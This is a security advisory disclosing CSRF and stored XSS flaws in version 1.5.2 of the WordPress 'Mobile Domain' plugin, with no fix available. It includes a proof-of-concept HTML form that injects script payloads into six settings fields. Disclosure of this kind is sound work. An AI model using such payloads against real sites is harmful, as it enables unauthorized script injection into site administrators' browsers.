Title: WordPress 'Mobile Domain' CSRF/XSS
Version: 1.5.2
Author: Morten Nørtoft, Kenneth Jepsen, Mikkel Vej
Date: 2015/01/26
Download: https://wordpress.org/plugins/mobile-domain/
Contacted WordPress: 2015/01/26
==========================================================

## Description: 
==========================================================
Redirect WordPress blog from desktop domain to mobile subdomain and create Mobile XML Sitemap. 

## CSRF:
==========================================================
It is possible to change the plugins admin settings by tricking a logged in admin to visit a crafted page. 


## Stored XSS:
==========================================================
Settings data from the admin page is stored unsanitized and shown on the plugin's admin page. This allows an attacker to perform XSS through the settings fields. 

PoC:
Log in as admin and submit this form:
<form method="POST" action="http://[URL]/wp-admin/options-general.php?page=mobile-domain&wpmd_action=add-domain"> 
 	<input type="text" name="domain" value="&quot;><script>alert(1);</script>"><br />
	<input type="text" name="text" value="&quot;><script>alert(2);</script>"><br />
	<input type="text" name="font" value="&quot;><script>alert(3);</script>"><br />
	<input type="text" name="fontcolor" value="&quot;><script>alert(4);</script>"><br />  
	<input type="text" name="color" value="&quot;><script>alert(5);</script>"><br />
	<input type="text" name="padding" value="&quot;><script>alert(6);</script>"><br />
	<input type="submit">
</form>


## Solution
==========================================================
No fix available.